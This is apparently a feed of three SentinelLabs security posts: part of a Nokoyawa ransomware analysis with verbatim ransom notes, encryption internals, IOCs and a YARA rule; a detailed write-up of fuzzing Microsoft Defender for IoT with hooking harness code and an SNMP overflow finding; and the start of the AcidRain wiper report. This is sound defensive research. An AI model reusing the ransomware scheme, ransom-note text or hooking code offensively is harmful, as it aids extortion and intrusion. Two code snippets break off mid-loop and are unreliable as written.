There are no significant similarities between the ransom notes except the use of email for contact points. Karma variants contained an .onion link that was also present in the Karma ransom note. We did not find any .onion links in Nokoyawa code or ransom note.

The Nokyoawa ransom note:

Dear usernamme, your files were encrypted, some are compromised.
Be sure, you can't restore it without our help.
You need a private key that only we have.
Contact us to reach an agreement or we will leak your black shit to media:

[email protected]
[email protected]

亲爱的用户名,您的文件已加密,有些已被泄露。
请确保,如果没有我们的帮助,您将无法恢复它。
您需要一个只有我们拥有的私钥。
联系我们以达成协议,否则我们会将您的黑屎泄露给媒体:

[email protected]
[email protected]

The Karma ransom note:

Your network has been breached by Karma ransomware group.
We have extracted valuable or sensitive data from your network and encrypted the data on your systems.
Decryption is only possible with a private key that only we posses.
Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.
Scamming is just bad for business in this line of work.
Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.
We advise you not to use any data recovery tools without leaving copies of the initial encrypted file.
You are risking irreversibly damaging the file by doing this.

If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.

http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/

If a ransom is payed we will provide the decryption key and proof that we deleted you data.
When you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.

How to contact us:
[email protected]
[email protected]
[email protected]

The ransom note filename uses a similar format as the previous versions: <ransom_extension>_<note_name>.txt.

Nokoyawa Karma
ransom_extension “NOKOYAWA” “KARMA” & “KARMA_V2”
note_name “_readme.txt” “-ENCRYPTED.txt”

The <ransom_extension> string has been used for many different functions, including:

  • file extension of encrypted files
  • appended as data to an encrypted file
  • ransom note filename part
  • mutex (the NOKOYAWA variant is observed to not make use of Mutexes)
  • to denote files to be excluded from further processing (e.g., to avoid running in a loop)

Nokoyawa’s Flawed Encryption Routine

During the file and folder enumeration, the new variant creates a hash of the enumerated folder and compares it to those of excluded folders. However, this custom hashing algorithm appears to have flaws as it doesn’t seem logical nor does it appear to work as expected.

Below is a Python representation of the hashing algorithm.

def nokoyawa_dir_hashing(folder):
    folder_len = len(folder)
    # to unicode
    folder = '\x00'.join([c for c in folder])
    # initial hash value
    nhash = 0x1505
    i = 0
    while i 

The implementation of this flawed hashing algorithm in some cases results in excluding multiple folders. Logically, one would expect there to be a 1:1 correlation between a hash and the folder to be excluded. However, the flawed code effectively makes it possible for multiple folders to be excluded based on a single hash. This code does not appear in Karma variants, which instead contain hardcoded strings denoting which folders to ignore during encryption.

The following table shows which folders the developers intended to skip during encryption.

Hash Folders Intended To Be Excluded
0x11f299b5 program files
0x78fb3995 program files (x86)
0x7c80b426 appdata
0x7c8cc47c windows
0xc27bb715 programdata
0xd6f02889 $recycle.bin

For extensions, the ransomware doesn't have any hashing algorithm and compares the raw strings with the extracted extension of the file. The excluded extensions are .exe, .dll, and .lnk. Files containing "NOKOYAWA" are also excluded.

Both Nokoyawa and Karma variants dynamically load bcrypt.dll and call BCryptGenRandom in order to generate 0x20 random bytes. They generate an ephemeral Sect233r1 key pair using the generated random bytes as the seed. The malware then uses the private ephemeral key and the public embedded key to generate a shared Salsa20 key, which is subsequently used for the file encryption. The Salsa20 nonce is hardcoded as “lvcelvce” in Nokoyawa, whereas in the Karma version it was "11111111".

An I/O completion packet is sent to the thread responsible for encryption. The packet includes the following:

  • File handle
  • File size
  • File data
  • Salsa20 key
  • Salsa nonce
  • public ephemeral key

The encryption thread has a switch containing four cases, as follows:

  • Case 1: Writes encrypted content and decryption struct to file and appends "extension"/"variant name".
  • Case 2: Calculates validation SHA1 hash and encrypts file data with Salsa20.
  • Case 3: Closes File Handle and moves files with the new extension.
  • Case 4: Exits.

In both variants, the initial switch case is "2".

Initial case, encryption thread
Encryption thread case handler

During Case 2, the malware adds a SHA1 checksum, which is possibly validated during the decryption phase. The method runs through the following logic:

  • Allocates 0x13 bytes (0x14 required for SHA1)
  • XORs Salsa key with a buffer of "6".
  • Concatenates file data to XORed Salsa key
  • Calculates SHA1.
  • XORs Salsa key with a buffer of "\".
  • Concatenates SHA1 hash to the second XORed Salsa key.
  • Calculates validation SHA1.
  • Validation SHA1 hash first 0x13 bytes are added to the encrypted file struct

Files encrypted by Nokoyawa will have the following structure.

struct nokoyawa_encrypted_file
{
    BYTE  encrypted_file_data[file_size],  // using salsa20
    BYTE  public_ephemeral_key[0x40],  // Sect233r1
    BYTE  validation_hash[0x13],  // last byte is chopped
    STRING ransomware_extension
}

The private key required for decryption is held by the attacker. When made available to the victim, the decryption routine reads the struct, extracts the public ephemeral key and generates the Salsa 20 key using the private key. The encrypted data is then decrypted with the key and validated by replicating the validated hash.

Conclusion

Nokoyawa code similarity and structure suggest it to be an evolution of the previous Nemty strain, Karma. This appears to be another attempt from the developer to confuse attribution. At this time, the actor appears not to have or provide any onion leak page.

SentinelLabs could not validate previous research suggesting Nokoyawa is related to Hive. Given the lack of code similarities between the two and the lack of further correlating data, we can only suggest that earlier researchers' findings may be explained by the possibility of an affiliate using both Hive and Nokoyawa.

SentinelLabs continues to follow and analyze the development of Nemty ransomware variants.

Indicators of Compromise

Karma Ransomware SHA1

960fae8b8451399eb80dd7babcc449c0229ee395

Nokoyawa Ransomware SHA1

2904358f825b6eb6b750e13de43da9852c9a9d91
2d92468b5982fbbb39776030fab6ac35c4a9b889
32c2ecf9703aec725034ab4a8a4c7b2944c1f0b7

Nokoyawa Ransom Note Email Addresses

[email protected]
[email protected]
[email protected]
[email protected]

Nokoyawa YARA Rule

rule Nokoyawa_Nemty
{
    meta:  
        author = "@Tera0017"
        description = "Nokoyawa, Nemty/Karma ransomware variant"    
        Reference = "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/"
    
    strings:
        $code1 = {B8 (41| 43) 00 00 00 [10-30] 83 F8 5A}
        $code2 = {48 8B 4C 24 08 F0 0F C1 01 03 44 24 10}      
        $code3 = {83 E8 20 88 [7] 48 C1 E0 05 48 03 44 24}
        $code4 = {48 C7 44 24 ?? 05 15 00 00}
        $string1 = "RGVhciB1c2VybmFtbWUsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0ZWQsIHNvbWUgY" ascii
        $string2 = "-network" fullword wide
        $string3 = "-help" fullword wide
        $winapi1 = "PostQueuedCompletionStatus" fullword ascii
        $winapi2 = "GetSystemInfo" fullword ascii
        $winapi3 = "WNetEnumResourceW" fullword ascii
        $winapi4 = "GetCommandLineW" fullword ascii
        $winapi5 = "BCryptGenRandom" fullword ascii
        
    condition:
        all of ($winapi*) and 4 of ($code*, $string*)
}

✇SentinelLabs

Inside the Black Box | How We Fuzzed Microsoft Defender for IoT and Found Multiple Vulnerabilities

By: Kasif Dekel

Introduction

Following on from our post into multiple vulnerabilities in Microsoft Azure Defender for IoT, this post discusses the techniques and infrastructure we used in our vulnerability research. In particular, we focus on the fuzzing infrastructure we developed in order to fuzz the DPI mechanism.

We explore the intricacies of developing an advanced fuzzer and describe our methods along with some of the challenges we met and overcame in the process. We hope that this will be of value to other researchers and contribute to the overall aim of improving product security in the enterprise.

In order to understand the context of what follows, readers are encouraged to review our previous post on the vulnerabilities we discovered and reported in Azure Defender for IoT.

Overview of Network Dissectors in the Horizon-Parser

Deep packet inspection (DPI) in Microsoft Azure Defender For IoT is achieved via the horizon component, which is responsible for analyzing network traffic. The horizon component loads built-in dissectors and can be extended to add custom network protocol dissectors.

The DPI infrastructure consists of two docker images that run on the sensor machine, Traffic-Monitor and Horizon-Parser.

The horizon-parser container is responsible for analyzing the traffic and extracting the appropriate fields as well as alerting if anomalies occur. This is the mechanism we will focus on since it is where the DPI is.

Let’s begin by taking a look at an overview of the horizon architecture:

Soure: MSDN

The main binary that the horizon-parser executes is the horizon daemon, which is responsible for the entire DPI process. In its initialization phase, this binary loads dissectors: shared libraries that implement network protocol parsers.

As an effective way to fuzz the network dissectors, we rely on binary instrumentation and an injected library that expands AFL to facilitate fast fuzzing mechanisms. While Microsoft had left some partially unstripped binaries containing only the function names, the vast majority of this research had to be performed “black box”. In addition to this, we had to compile a lot of dependency libraries and load their symbols into IDA to make the research easier.

Microsoft has released some limited information about how to implement a custom dissector. According to this information, a dissector is implemented via the following C++ interface:

#include “plugin/plugin.h”
namespace {
 class CyberxHorizonSDK: public horizon::protocol::BaseParser
  public:
   std::vector processDissectAs(const std::map<:string std::vector>> &filters) const override {
     return std::vector();
   }
   horizon::protocol::ParserResult processLayer(horizon::protocol::management::IProcessingUtils &ctx,
                                                horizon::general::IDataBuffer &data) override {
     return horizon::protocol::ParserResult();
   }
 };
}
 
extern "C" {
  std::shared_ptr<:protocol::baseparser> create_parser() {
    return std::make_shared();
  }
}
  • processDissectAs – Called when a new plugin is loaded with a map containing the structure of dissect_as, as defined in a JSON configuration file.
  • processLayer – The main function of the dissector. Everything related to packet processing should be done here. Each time a new packet is being routed to the dissector, this function will be called.
  • create_parser – Called when the dissector is loaded, used by the horizon binary in order to recognize and register the dissector. In addition, it is responsible for an early bootstrapping of the dissector.

A dissector is built in a layered configuration, meaning that each dissector is responsible for one layer and then the horizon service is responsible for passing the outcome to the next layer in the chain:

Source: MSDN

A dissector consists of a JSON configuration file, the binary file itself, and other metadata. Understanding the JSON configuration file is not necessary to follow the rest of the post, but it’ll give you the look and feel of the system.

Below is an example of the JSON configuration file for the FTP dissector.

{
  "id": "FTP",
  "override_id": 38,
  "library": "ftp",
  "endianess": "big",
  "backward_compatability": true,
  "metadata": {
    "is_distributed_control_system": false,
    "has_protocol_address": false,
    "is_scada_protocol": false,
    "is_router_potenial": false
  },
  "sanity_failure_codes": {
    "Not enough data": 1,
    "no result identified": 2
  },
  "malformed_codes": {
    "End of line not found": 2,
    "Wrong ports": 3,
    "No token found": 4,
<redacted>
  },
  "exports_dissect_as": {},
  "dissect_as": {
    "TCP": {
      "port": ["21"]
    }
  },
  "fields": [
    {
      "id": "response_code",
      "type": "numeric"
    },
<redacted>
    {
      "id": "firmware",
      "type": "array:complex",
      "fields": [
        {
          "id": "fwid",
          "type": "string"
        },
        {
          "id": "device_id",
          "type": "string"
        }
      ]
    }
  ]
}

Below is a list of the pre-installed dissectors that come with Azure Defender For IoT sensor machine.

Our task is to fuzz processLayer, as this is the routine that is responsible for actually parsing packet data. However, fuzzing stateful network services is not a simple task in any circumstances; fuzzing it on a black box target only adds to the complexity.

Fuzzing Dissectors with E9AFL

After some testing and experimentation, we chose AFL for fuzzing the dissectors, but we had to help it a little and provide coverage feedback to actually enable it to efficiently fuzz our targets.

To overcome the lack of sources we used e9afl with minor changes to fit our goals. E9AFL is an open source binary-level instrumentation project that relies on e9patch, a powerful static binary rewriting tool for x86_64 Linux ELF binaries. Interested readers can dive more into the background of E9AFL here.

We begin our instrumentation with E9AFL using the following commands.

./e9afl readelf
mkdir -p input
mkdir -p output
head -n 1 `which ls` > input/exe
afl-fuzz -m none -i input/ -o output/ -- ./readelf.afl -a @@

For our target, we needed to make some adjustments. For the sake of speed as well as other reasons that will be explained further below, we wanted to control the fork server initialization phase. We also wanted to accurately choose an initialization spot for the binary fuzzing to start. Given these requirements, we chose to modify the init function in the inserted instrumentation by commenting out the fork server initialization. As will be explained below, we implement this initialization manually later.

At this point, it is probably worth reminding readers that, to improve performance, afl-fuzz uses a “fork server”, where the fuzzed process goes through execve(), linking, and libc initialization only once, and is then cloned from a stopped process image by leveraging copy-on-write. The implementation is described in more detail here.

The point where we chose to start the fork server is a little before the entry point of processLayer on the invoked target dissector. However, in order to do so and also support generic fuzzing for every dissector, we needed to reverse engineer the horizon binary to understand the internal structures that are passed between these routines.

Unfortunately, this turned out to be a very tedious task since the code is very large, highly complex and written in modern C++. In addition, the horizon binary implements a framework of handling network traffic data.

Instead of spending time reversing the whole structures and relevant code, we came up with another idea and facilitated a special harness. We let the horizon binary run, then stopped it at a strategic location where all the structures had been populated and were ready to use, modified the appropriate fields to insert a test case, and continued execution with the fork server.

This meant that we did not need the entire structures passed to processLayer; some can be left untyped as we only relay those pointers (e.g., Dissection Context).

typedef void* (*process_layer_t)(void* parser_result, void* base_parser, void* dissection_context, data_buffer_t* data_buffer);

The data_buffer_t struct, which contains the packet data, needs to be modified for each execution of the fuzzee to feed new test cases to the fuzzer.

typedef struct __attribute__((packed)) __attribute__((aligned(4))) data_buffer
{
    void* _vftbl;
<redacted>
    unsigned long long cursor;
    unsigned long long data_len;
    unsigned long long total_data_len;
    void* data_ptr;
    void* data_ptr_end;
    void* curr_data_ptr;
    int field_80;
} data_buffer_t;

Let’s consider a brief flowchart of the fuzzing process.

We use AFL_PRELOAD or LD_PRELOAD (depending on the execution) to inject our fuzzer helper library into the fuzzee to facilitate a fuzzing ready environment.

The first code that runs in the library is the run() function, which is sort of a shared library entry point:

__attribute__((constructor)) int run() {
    char* current_path = realpath("/proc/self/exe", NULL);
 
    if (strstr(current_path, HORIZON_PATH) == 0) {
        return -1;
    }
 
    should_hook = 1;
    return 0;
}

As shown, it checks whether the main module is horizon and if it is, it enables the hooks by setting should_hook to true.

Since this library is injected in the early stages of the process creation, we have to set a temporary hook to a function, which in turn will set the hook to the real target function. The following function was chosen by reverse engineering. We found that it was being called by horizon in later stages of execution but before the packet processing actually starts.

	int (*setsockopt_orig)(int sockfd, int level, int optname, const void* optval, socklen_t optlen);
int setsockopt(int sockfd, int level, int optname, const void* optval, socklen_t optlen) {
    if (!setsockopt_orig) setsockopt_orig = dlsym(RTLD_NEXT, "setsockopt");
    if (done_hooking || !should_hook) {
        return setsockopt_orig(sockfd, level, optname, optval, optlen);
    }
    done_hooking = 1;
    hooker();
 
    return setsockopt_orig(sockfd, level, optname, optval, optlen);
}

This is due to the fact that our library is loaded when the process isn’t fully mapped yet. This function calls the hooker function, shown below.

int hooker() {
    horizon_baseaddr = get_lib_addr("horizon") + INSTRUMENTED_OFFSET;
 
    printf("horizon_baseaddress %p aligned: %p offset: %x\n", horizon_baseaddr, horizon_baseaddr + (CALL_PROCESS_HOOK_OFFSET & 0xff000), (CALL_PROCESS_HOOK_OFFSET & 0xff000));
    int ret_val = mprotect(horizon_baseaddr + (CALL_PROCESS_HOOK_OFFSET & 0xff000), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
 
    <redacted>
 
    addr_to_returnto = (unsigned long long)(((char*)horizon_baseaddr) + (CALL_PROCESS_HOOK_OFFSET + 13));
    void* dest = horizon_baseaddr + CALL_PROCESS_HOOK_OFFSET;
 
    jump_struct_t jump_struct;
    jump_struct.moveopcode[0] = 0x49;
    jump_struct.moveopcode[1] = 0xbb;
    jump_struct.address = (unsigned long long) trampoline;
    jump_struct.pushorjump[0] = 0x41;  
    jump_struct.pushorjump[1] = 0xff;
    jump_struct.pushorjump[2] = 0xe3;
 
    memcpy(dest, &jump_struct, sizeof(jump_struct_t));
}

The INSTRUMENTED_OFFSET is an offset added to the main module by E9AFL. As can be seen, CALL_PROCESS_HOOK_OFFSET is our target code to be hooked by the trampoline code, which is right before processLayer is invoked.

The code above is only executed when a packet arrives; thus, we send a dummy packet to the target fuzzee.

The dissectionContext structure contains the state of the layered packet. For example, an HTTP packet is composed of several layers, including: ETHERNET, IPV4, TCP and HTTP, so the dissectionContext will contain information regarding each layer in the chain.

Since reconstructing all relevant structures can be tedious, for our purposes we can use an already populated dissectionContext as we only fuzz one layer at a time.

Let’s next take a look at the trampoline() code.

__attribute__((naked)) void trampoline() {
    __asm__(
        ".intel_syntax;"
        "push %%rax;" //backup rax
        "mov %%eax, [%%rsi+0x10];"
#ifdef IS_UDP
        "cmp %%eax, 0xe23ff64c;" // DNS CONST, for UDP
#else
        "cmp %%eax, 0x3d829631;" // HTTP CONST, for TCP
#endif
        "pop %%rax;" //restore rax
        "jz prepare_fuzzer;"
        "push %%rbp;"
        "push %%rbx;"
        "sub %%rsp, 0x1b8;"
        "mov [%%rsp], %%rdi;"
        "mov %%rdi, %0;"
        "jmp %%rdi;"
        ".att_syntax;"
        :: "p" (addr_to_returnto)
    );
}

The trampoline is responsible for redirecting the execution to the prepare_fuzzer function when the proper conditions are met. When our dummy packet is received, the trampoline compares the current layer ID to the HTTP constant. Although we chose HTTP arbitrarily, it could be any Layer7 protocol that sits on top of TCP. The same goes for UDP, but we use the DNS Layer ID instead. If it doesn’t match, we restore the correct program state by manually executing the overwritten instructions and jumping back to the continuation of the hooked function.Ultimately, we want to achieve a state where the dissectionContext points to a TCP/UDP previousLayer, depending on our target. This means that we only need to change the data buffer to our test case.

In the above scenario, rsi holds a pointer to dissectionContext, which contains the layer Id in offset 0x10 (pluginId on the picture).

When the above conditions are met, our fuzzee reaches this prepare_fuzzer.

At this point, we want to ensure that this function only gets executed once for each fuzzing instance.

int prepare_fuzzer(void* res, void* dissection_context) {
    if (did_hook_happened) {
        while (true) {
            sleep(1000);
        }
    }
    did_hook_happened = 1;

Notice that the function signature matches (partly) with the horizon::protocol::ParserOrchestrator::ParserOrchestratorImpl::callProcess function.

The rest of the parameters aren’t needed for us, since we can create them ourselves.

Customizing and Running The Fuzzer

There are about 100 builtin dissectors we want to fuzz. To make our fuzzing process easier, a number of generic environment variables were added that let us change the fuzzing target directly from the command line.

const char* target_fuzzee = getenv("__TARGET_FUZZEE");
    const char* target_path = getenv("__TARGET_FUZZEE_PATH");
    const char* target_symbol = getenv("__TARGET_SYMBOL");
    const char* fuzzfile = getenv("__FUZZFILE");
 
    if (!target_fuzzee || !target_symbol || !target_path || !fuzzfile) {
        printf("Failed to get environment variables target_fuzzee: %s, target_symbol: %s target_path: %s fuzzfile: %s\n", target_fuzzee, target_symbol, target_path, fuzzfile);
        ret_val = -1;
        exit(ret_val);
    }
  • The target_fuzzee variable is used to find our target dissector base address to further lookup necessary symbols (e.g., “libhttp”).
  • The target_path variable (described later) is used for symbol lookup (e.g., “/opt/horizon/lib/horizon/http/libhttp.so”).
  • The target_symbol variable is the symbol of the processLayer routine in our target dissector, for example:
    _ZN12_GLOBAL__N_110HTTPParser12processLayerERN7horizon8protocol10management16IProcessingUtilsERNS1_7general11IDataBufferE
  • The fuzzfile variable is the file that AFL is using to feed the fork server with new test cases.

Next, the lookup for create_parser is done:

void* real_lib_handle = dlopen(target_path, RTLD_NOW);
 
    if (real_lib_handle == NULL) {
        printf("Failed to get library handle\n");
        ret_val = -1;
        exit(ret_val);
    }
 
    printf("lib handle pointer %p\n", real_lib_handle);
    create_parser_addr = dlsym(real_lib_handle, "create_parser");
 
    if (create_parser_addr == NULL) {
        printf("Failed to get create_parser address\n");
        ret_val = -1;
        exit(ret_val);
    }

Then create_parser is called in order to obtain a pluginBase object of the target dissector, which is later passed to processLayer.

    printf("create_parser address %p\n", create_parser_addr);
 
    unsigned long long out = 0;
    void** create_parser_obj = create_parser_addr(&out);
 
    printf("create_parser obj  %p\n", *create_parser_obj);

Afterwards, a number of function pointers are obtained:

  handle_t* horizon_handle = create_module_handle(horizon_baseaddr, HORIZON_PATH);
 
    if (horizon_handle == NULL) {
        printf("horizon_handle is NULL \n");
        ret_val = -1;
        exit(ret_val);
    }
 
    lib_baseaddr = get_lib_addr((char*)target_fuzzee);
    printf("lib_baseaddress %p\n", lib_baseaddr);
    handle_t* lib_handle = create_module_handle(lib_baseaddr, (char*)target_path);
 
    if (lib_handle == NULL) {
        printf("lib_handle is NULL \n");
        ret_val = -1;
        exit(ret_val);
    }
 
    data_buffer_construct_ptr = lookup_symbol(horizon_handle, "_ZN7horizon7general10DataBufferC2Ev");
    printf("data_buffer_addr: %p\n", data_buffer_construct_ptr);
 
    process_layer_t process_layer_ptr = (process_layer_t)lookup_symbol(lib_handle, target_symbol);

The create_module_handle function maps the specified path to the memory and is used to search for an address to a function using a symbol name. This is required because dlopen does not load the symbol table.

Next, we lookup a pointer to the horizon::general::DataBuffer::DataBuffer constructor that initialises the data buffer object for us, and then we populate the appropriate fields to set it to our testcase. This is performed by create_data_buffer, which is used later in the code:

data_buffer_t* create_data_buffer(unsigned char* buffer, unsigned int len) {
    printf("data buffer size: %ld\n", sizeof(data_buffer_t));
    data_buffer_t* data_buffer = malloc(sizeof(data_buffer_t));
 
    if (data_buffer == NULL) {
        printf("Failed to allocate data buffer\n");
        return NULL;
    }
 
    data_buffer_construct_ptr(data_buffer);
 
    data_buffer->cursor = 0;
    data_buffer->data_len = len;
    data_buffer->total_data_len = len;
    data_buffer->data_ptr = buffer;
    data_buffer->data_ptr_end = &buffer[len];
    data_buffer->curr_data_ptr = buffer;
 
    return data_buffer;
}

We fire up the fork server and initialize afl’s coverage bitmap. Next, we read the test case data from the specified file. Finally, we create the data buffer with the test case and call the processLayer function.

	    __afl_map_shm();
    __afl_start_forkserver();
    //special point
    FILE* f = fopen(fuzzfile, "rb");
    if (f) {
        fseek(f, 0, SEEK_END);
        length = ftell(f);
        fseek(f, 0, SEEK_SET);
        fuzzbuffer = malloc(length);
        if (fuzzbuffer) {
            fread(fuzzbuffer, 1, length, f);
        }
        fclose(f);
    }
 
    if (fuzzbuffer) {
        data_buffer_t* buffer = create_data_buffer((unsigned char*)fuzzbuffer, length);
        process_layer_ptr(parser_result, *create_parser_obj, dissection_context, buffer);
    }
 
    _exit(0); // we only fuzz one dissector at a time

Every time the fuzzer executes a new test case, the execution continues from the “special point” as marked above.

To execute the fuzzer, we used the following command:

AFL_PRELOAD=/tmp/fuzzer/libloader.so __TARGET_FUZZEE=libsnmp __TARGET_FUZZEE_PATH=/opt/horizon/lib/horizon/snmp/libsnmp.so __TARGET_SYMBOL=_ZN12_GLOBAL__N_19SNMParser12processLayerERN7horizon8protocol10management16IProcessingUtilsERNS1_7general11IDataBufferE __FUZZFILE=/tmp/fuzzer/dissectors/libsnmp/fuzzfile.txt afl-fuzz -i /tmp/fuzzer/dissectors/libsnmp/in -o /tmp/fuzzer/dissectors/libsnmp/out -f /tmp/fuzzer/dissectors/libsnmp/fuzzfile.txt -m 100000 -M libsnmpmaster /opt/horizon/bin/horizon.instrumented

When we tested our fuzzer, we experienced several stability issues.

The fuzzer reported non-reproducible crashes and stability sometimes dropped to 0.1%. This happened because horizon had several threads doing polling, which generated non-deterministic behaviour. To fix this issue  we had to block the polling before the fork server started. Thus, we introduced the following hook.

int (*poll_orig)(struct pollfd* fds, nfds_t nfds, int timeout);
int poll(struct pollfd* fds, nfds_t nfds, int timeout) {
    if (!poll_orig)
        poll_orig = dlsym(RTLD_NEXT, "poll");
    if (should_end_poll) {
        pause();
    }
 
    return poll_orig(fds, nfds, timeout);
}

Right before starting the fork server, we set should_end_poll to true, which blocks this API.

   should_end_poll = 1;
    sleep(1);
 
    __afl_map_shm();
    __afl_start_forkserver();

This fixed the stability issue and raised it to above 99.5%.

The latest version of the loader can be found here.

Enhancing the Fuzzer’s Efficiency

We’ve done some fuzzing at this point, but we wanted to enhance and efficiently use our machines’ resources. However, we could not run two fuzzing instances simultaneously on the same machine. This is due to the fact that horizon listens on some sockets which prevents other instances from running as well.

We solved this problem via two different solutions. The first solution simply closes all the relevant sockets before starting the fork server:

void closesockets() {
    int i = 0;
    for(i=0; i

The second approach eliminates the need to actually send a packet to horizon. We found that the horizon service can be used in two modes:

  • Live packet capture - When used, horizon will capture packets from a port mirror. This is the default configuration mode, rcdcap.
  • Offline mode (PCAP) - In this mode, horizon will load a PCAP file from the disk and replay the traffic.
horizon.stats.interval=5
horizon.logger.stats=/var/cyberx/logs/horizon.stats.log
horizon.logger.default=/var/cyberx/logs/horizon.log
horizon.logger.format=%Y-%m-%d %H:%M:%S,%i %p [%P - %I] - %t
horizon.processor.type=live
horizon.processor.filter=
horizon.processor.workers=1
 
<redacted>

By reverse engineering the horizon binary, we figured out that we could change the processor time to be “file” and have it load a PCAP file as mentioned above.


This eventually made the configuration file look like this:

horizon.stats.interval=5
horizon.logger.stats=/var/cyberx/logs/horizon.stats.log
horizon.logger.default=/var/cyberx/logs/horizon.log
horizon.logger.format=%Y-%m-%d %H:%M:%S,%i %p [%P - %I] - %t
horizon.processor.type=file
horizon.processor.filter=
horizon.processor.workers=1
horizon.processor.file.path=/tmp/fuzzer/traffic.pcap
horizon.processor.afpacket.caplen=4096
horizon.processor.afpacket.blocks=5
 
<redacted>

All of these enhancements enabled us to execute numerous fuzzing instances.

At this point, we created a Telegram bot to report fuzzing progress, control coverage collecting per test case, and retrieve files from the fuzzer.

Checking Results and Finding Vulnerabilities

In order to check the fuzzer’s progress, we created a Python script that takes every new test case from each fuzzing instance and runs it with Intel PIN and lighthouse library, which allows us to see the coverage more easily in IDA Pro.

We ended up finding a lot of DOS vulnerabilities, which thanks to the Data buffer framework turned out to be pretty safe. Most of the DOS bugs we found were due to infinite recursion stack overflows.

Although we did not fuzz all possible dissectors, we eventually found a buffer overflow vulnerability in libsnmp.so.

The vulnerability occurs in the processVarBindList function. When calling the OBJECT_IDENTIFIER_get_arcs function, the code doesn't check the return value correctly and is being used as a loop stop condition. This loop copies controlled data to a stack buffer.

Sending a specially crafted packet causes OBJECT_IDENTIFIER_get_arcs to fail, and return a -1 value. Afterwards, the conditional statement does not check the value properly, resulting in a buffer overflow vulnerability with controlled data.

Conclusion

The fuzzing techniques we developed here helped us to find multiple vulnerabilities in Microsoft Azure Defender for IoT. The results of our research showed that vulnerabilities in the DPI infrastructure could be triggered by simply sending a packet within the monitored network; the exploit could be directed at any device since the DPI infrastructure monitors the network traffic, and an attacker does not need to have direct access to the sensor itself, rendering these kind of vulnerabilities more dangerous.

More generally, we hope the techniques described in this post will help others to develop their own advanced fuzzers, find currently unknown vulnerabilities and improve the security of closed-source products.

✇SentinelLabs

AcidRain | A Modem Wiper Rains Down on Europe

By: Juan Andrés Guerrero-Saade

By Juan Andres Guerrero-Saade (@juanandres_gs) and Max van Amerongen (@maxpl0it)

Executive Summary

  • On Thursday, February 24th, 2022, a cyber attack rendered Viasat KA-SAT modems inoperable in Ukraine.
  • Spillover from this attack rendered 5,800 Enercon wind turbines in Germany unable to communicate for remote monitoring or control.
  • Viasat’s statement on Wednesday, March 30th, 2022 provides a somewhat plausible but incomplete description of the attack.
  • SentinelLabs researchers discovered new malware that we named ‘AcidRain’.
  • AcidRain is an ELF MIPS malware designed to wipe modems and routers.
  • We assess with medium-confidence that there are developmental similarities between AcidRain and a VPNFilter stage 3 destructive plugin. In 2018, the FBI and Department of Justice attributed the VPNFilter campaign to the Russian government
  • AcidRain is the 7th wiper malware associated with the Russian invasion of Ukraine.
  • Update: In a statement disseminated to journalists, Viasat confirmed the use of the AcidRain wiper in the February 24th attack against their modems.

Context

The Russian invasion of Ukraine has included a wealth of cyber operations that have tested our collective assumptions about the role that cyber plays in modern warfare. Some commentators have voiced a bizarre disappointment at the ‘lack of cyber’ while those at the coalface are overwhelmed by the abundance of cyber operations accompanying conventional warfare. From the beginning of 2022, we have dealt with six different strains of wiper malware targeting Ukraine: WhisperKill, WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero. These attacks are notable on their own. But there’s been an elephant in the room by way of the rumored ‘satellite modem hack’. This particular attack goes beyond Ukraine.

We first became aware of an issue with Viasat KA-SAT routers due to a reported outage of 5,800 Enercon wind turbines in Germany. To clarify, the wind turbines themselves were not rendered inoperable but “remote monitoring and control of the wind turbines” became unavailable due to issues with satellite communications. The timing coincided with the Russian invasion of Ukraine and suspicions arose that an attempt to take out Ukrainian military command-and-control capabilities by hindering satellite connectivity spilled over to affect German critical infrastructure. No technical details became available; technical speculation has been rampant.

On Wednesday, March 30th, 2022, Viasat finally released a statement stating that the attack took place in two phases: First, a denial of service attack coming from “several SurfBeam2 and SurfBeam2+ modems and […other on-prem equipment…] physically located within Ukraine” that temporarily knocked KA-SAT modems offline. Then, the gradual disappearance of modems from the Viasat service. The actual service provider is in the midst of a complex arrangement where Eutalsat provides the service, but it’s administered by an Italian company called Skylogic as part of a transition plan.

The Viasat Explanation

At the time of writing, Viasat has not provided any technical indicators nor an incident response report. They did provide a general sense of the attack chain with conclusions that are difficult to reconcile.

Viasat reports that the attackers exploited a misconfigured VPN appliance, gained access to the trust management segment of the KA-SAT network, moved laterally, then used their access to “execute legitimate, targeted management commands on a large number of residential modems simultaneously”. Viasat goes on to add that “these destructive commands overwrote key data in flash memory on the modems, rendering the modems unable to access the network, but not permanently unusable”.

It remains unclear how legitimate commands could have such a disruptive effect on the modems. Scalable disruption is more plausibly achieved by pushing an update, script, or executable. It’s also hard to envision how legitimate commands would enable either the DoS effects or render the devices unusable but not permanently bricked.

In effect, the preliminary Viasat incident report posits the following requirements:

  1. Could be pushed via the KA-SAT management segment onto modems en masse
  2. Would overwrite key data in the modem’s flash memory
  3. Render the devices unusable, in need of a factory reset or replacement but not permanently unusable.

With those requirements in mind, we postulate an alternative hypothesis: The threat actor used the KA-SAT management mechanism in a supply-chain attack to push a wiper designed for modems and routers. A wiper for this kind of device would overwrite key data in the modem’s flash memory, rendering it inoperable and in need of reflashing or replacing.

Subsequent to this post being published, Viasat confirmed to journalists that our analysis was consistent with their reports.

Viasat told BleepingComputer that “The analysis in the SentinelLabs report regarding the ukrop binary is consistent with the facts in our report – specifically, SentinelLabs identifies the destructive executable that was run on the modems using a legitimate management command as Viasat previously described”.

The AcidRain Wiper

On Tuesday, March 15th, 2022, a suspicious upload caught our attention. A MIPS ELF binary was uploaded to VirusTotal from Italy with the name ‘ukrop’. We didn’t know how to parse the name accurately. Possible interpretations include a shorthand for “ukr”aine “op”eration, the acronym for the Ukrainian Association of Patriots, or a Russian ethnic slur for Ukrainians – ‘Укроп’. Only the incident responders in the Viasat case could say definitively whether this was in fact the malware used in this particular incident. We posit its use as a fitting hypothesis and will describe its functionality, quirky development traits, and possible overlaps with previous Russian operations in need of further research.

Technical Overview

SHA256 9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a
